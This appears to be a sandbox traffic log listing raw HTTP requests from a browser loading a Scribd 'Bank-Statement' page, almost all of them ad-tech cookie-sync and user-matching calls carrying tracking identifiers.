Source: global trafficHTTP traffic detected: GET /cm-notify?pi=rise HTTP/1.1Host: creativecdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cookie?redirect_url=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11606%26gdpr%3D%5BGDPR%5D%26gdpr_consent%3D%5BUSER_CONSENT%5D%26uid%3D%24UID HTTP/1.1Host: cm.adform.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D130%26advUuid%3D%24UID&sovrn_retry=true HTTP/1.1Host: ap.lijit.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/js/user_sync.html?kdntuid=1&p=156696 HTTP/1.1Host: ads.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/rid?ttd_pid=j6w8ta9&fmt=json HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/config/prebid HTTP/1.1Host: id5-sync.comConnection: keep-aliveContent-Length: 398sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /um/ixmatch.html HTTP/1.1Host: js-sec.indexww.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /redirectuser?consent_string=&gdpr=0&r=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11612%26id%3D%24UID&sid=716 HTTP/1.1Host: ssp.disqus.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /id HTTP/1.1Host: id.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _cc_id=4e6cf26d9ffd6560f5c4b1ad4636338e
Source: global trafficHTTP traffic detected: GET /usync.html?endpoint=us-east&p=rise_engage HTTP/1.1Host: eus.rubiconproject.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /ima.js HTTP/1.1Host: cdn-ima.33across.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8If-None-Match: W/"678fc4e6-41f8"If-Modified-Since: Tue, 21 Jan 2025 16:01:42 GMT
Source: global trafficHTTP traffic detected: GET /pixel?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11607%26uid%3D%24UID&sovrn_retry=true HTTP/1.1Host: ap.lijit.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/getpixels?tagger_id=b9be9e1d9d5a9785a6417a9309e00232&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&code=%27none%27 HTTP/1.1Host: pixels.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: au_id=AU1D-0100-001739863021-EHT1L4CA-5M76; au_3p_check=1
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=primis&zcc=1&cb=1739863027269 HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ats-modules/6ff45175-4a3f-453a-8ee5-b2b22dd6355c/ats.js HTTP/1.1Host: ats-wrapper.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11607&uid= HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /i/882/8.gif?o=api&id5id=ID5*s_otpEGT8l5l1-pR0yUCECeBgXaJJwB8TB_Zb5GMypr6ZXZK5xNmy6IwMlfm7XgG&gdpr_consent=undefined&gdpr=false HTTP/1.1Host: id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11592&uid=V22NFapzdQQi&ev=1&us_privacy=[US_PRIVACY]&gdpr_consent=&pid=562615&gdpr=0 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /sync?redirect=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11595%26id%3D%7BID5UID%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=115667&uid=5b23e17a-294a-4886-be16-dbab49a7a932 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11580&puid=213023946785716 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11571&id=88d7ae9b-757d-4195-ad7d-f0171149038f&gdpr_consent=null&gdpr=0 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=zeta&gdpr=0&gdpr_consent=&us_privacy=&redir=https%3A%2F%2Fssp.disqus.com%2Fmatch%3Fbidder%3D37%26buyeruid%3D%5BRX_UUID%5D%26r%3DCid1YS1hNDc3YzRhYi01MjNlLTM3MDQtODA5My04YzVjYTM0ZjY3OGIqYmh0dHBzOi8vY3Mtc2VydmVyLXMycy55ZWxsb3dibHVlLmlvL2NzP2Z3cmQ9MSZhaWQ9MTE2MTImaWQ9dWEtYTQ3N2M0YWItNTIzZS0zNzA0LTgwOTMtOGM1Y2EzNGY2NzhiMgIlGzgB HTTP/1.1Host: sync.1rx.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cm-notify?pi=rise&tc=1 HTTP/1.1Host: creativecdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: ts=1739863027
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=typeaholdings&zcc=1&cb=1739862995510 HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pbsync?gdpr=0&gdpr_consent=&is=rise&redirectUri=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11584%26uid%3D%24UID&us_privacy= HTTP/1.1Host: ads.yieldmo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?aid=11587&uid=af24be0b-9eaa-4e93-b086-26a79da7677b&gdpr=0 HTTP/1.1Host: cs.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /lb/v1 HTTP/1.1Host: lb.eu-1-id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11563&id=2a8114f0-34da-4d1c-8de4-4aa94395f761 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /check_uuid/https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Faid%3D11603%26gdpr%3D%5BGDPR%5D%26gdpr_consent%3D%5BUSER_CONSENT%5D%26uid%3D$%7BBSW_UUID%7D HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11596%26gdpr%3D%5BGDPR%5D%26gdpr_consent%3D%5BUSER_CONSENT%5D%26id%3D%24UID HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /user-matching?gdpr=0&gdpr_consent=&id=3663 HTTP/1.1Host: ads.stickyadstv.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
